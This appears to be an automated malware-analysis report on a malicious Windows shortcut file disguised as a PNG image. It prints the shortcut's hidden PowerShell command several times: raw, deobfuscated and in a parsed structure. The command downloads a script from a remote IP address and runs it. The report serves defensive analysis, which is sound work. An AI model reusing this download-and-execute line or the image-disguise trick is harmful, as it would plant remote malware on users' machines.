Malicious
Characteristics
583cbe6dd27498a0965ab9e0e54dd674 (218.08 KB)
No malware configuration was found at this point.
Artefacts

Name: LNK: Command Execution
Value: powershell.exe -w Hidden $w = New-Object Net.WebClient; $w.Headers.Add('User-Agent', 'UA WindowsPowerShell'); . ([ScriptBlock]::Create($w.DownloadString('http://86.54.42.162/dzgn/alpacafloor.ps1')))
Malicious
Location: 583cbe6dd27498a0965ab9e0e54dd674

Name: Deobfuscated PowerShell
Value: -w "Hidden" $w "=" "New-Object" "Net.WebClient" $w."Headers"."Add"("User-Agent", "UA WindowsPowerShell") . ([ScriptBlock]::"Create"($w."DownloadString"("http://86.54.42.162/dzgn/alpacafloor.ps1")))
Malicious
Location: 583cbe6dd27498a0965ab9e0e54dd674 > LNK CommandLine

Name: Deobfuscated PowerShell
Value:
  shortcut:
    headersize: 76 76
    linkclsid: "00021401-0000-0000-c000-000000000046"
    linkflags: @("HasLinkTargetIDList", "HasName", "HasWorkingDir", "HasArguments", "HasIconLocation", "IsUnicode", "ForceNoLinkInfo")
    fileattributes: 0
    creationtime: "12/4/2025" "3:24:36" "PM"
    accesstime: "12/4/2025" "3:24:36" "PM"
    writetime: "12/4/2025" "3:24:36" "PM"
    filesize: 0 0
    iconindex: 116
    showcommand: "SW_SHOWMINNOACTIVE"
    hotkey: 0
    linktargetidlist:
      idlistsize: 395 395
      displayname: "powershell"
      path: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    stringdata:
      namestring: "PNG" "Fil??"
      workingdir: "%APPDATA%"
      commandlinearguments: -w "Hidden" $w "=" "New-Object" "Net.WebClient" $w."Headers"."Add"("User-Agent", "UA WindowsPowerShell") . ([ScriptBlock]::"Create"($w."DownloadString"("http://86.54.42.162/dzgn/alpacafloor.ps1")))
      iconlocation: "imageres.dll"
Malicious
Location: 583cbe6dd27498a0965ab9e0e54dd674 > [Lnk Summary]
